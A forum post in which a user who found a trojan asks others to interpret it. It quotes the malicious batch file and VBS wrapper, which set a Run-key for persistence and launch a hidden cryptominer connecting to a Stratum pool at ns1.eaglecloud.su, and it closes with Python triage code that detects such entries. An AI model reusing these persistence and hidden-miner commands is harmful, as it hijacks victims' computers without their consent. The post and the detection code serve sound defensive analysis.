Channel: The Official Scripting Guys Forum! forum

Interpreting trojan bat file

Good Morning All,

My system was really slow one morning. Task Manager showed that Internet Download Manager was running even though I never installed it. I found its location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.

A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.

The bat file that started it was:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

The vbs script file in the same folder as the bat file was:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.

I know this is a trojan of some kind. But could someone please interpret the bat and script files for me, and what information these are sending to ns1.eaglecloud.su?

Thank you
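
A static read of the batch file quoted above, added here as an example and not part of the original post: the first command writes a per-user Run value so the script relaunches at logon (through the VBS wrapper, which runs its argument in a hidden window), and the second starts the executable with a Stratum mining-pool URL. It assumes the `-o`/`-u`/`-p` flags carry the usual cpuminer-style meaning (pool URL, account, password); the `triage` function and its field names are illustrative.

```python
import re

# Verbatim copy of the IDMan.bat lines quoted in the post, used as sample input.
SAMPLE_BAT = r'''@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
'''

# reg add <...\CurrentVersion\Run> /v <name> /d "<command>" creates an autostart entry.
RUN_KEY = re.compile(
    r'reg(?:\.exe)?\s+add\s+(?P<key>\S*\\currentversion\\run(?:once)?)\s+'
    r'/v\s+(?P<name>\S+)\s+/d\s+"(?P<data>(?:\\"|[^"])*)"', re.I)
# Stratum is the protocol mining clients use to talk to a pool.
STRATUM = re.compile(r'stratum\+(?:tcp|ssl|tls)://(?P<host>[^\s:/]+):(?P<port>\d+)', re.I)
# Assumption: -u / -p follow the cpuminer-style meaning (pool account, pool password).
USER = re.compile(r'(?<!\S)-u\s+(\S+)')
PASSWORD = re.compile(r'(?<!\S)-p\s+(\S+)')

def triage(bat_text):
    """Return findings (persistence entries, miner launches) found in a batch file."""
    findings = []
    for line in bat_text.splitlines():
        run = RUN_KEY.search(line)
        if run:
            findings.append({
                "type": "persistence",
                "key": run["key"],
                "value_name": run["name"],
                # reg.exe takes inner quotes escaped as \" ; undo that to get the command.
                "command": run["data"].replace('\\"', '"'),
            })
        pool = STRATUM.search(line)
        if pool:
            user, pw = USER.search(line), PASSWORD.search(line)
            findings.append({
                "type": "miner",
                "pool_host": pool["host"],
                "pool_port": int(pool["port"]),
                "account": user[1] if user else None,
                "password": pw[1] if pw else None,
            })
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_BAT):
        print(finding)
```

The same function can be pointed at any other `.bat` or `.cmd` file recovered from the folder to list what it persists and where it connects.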
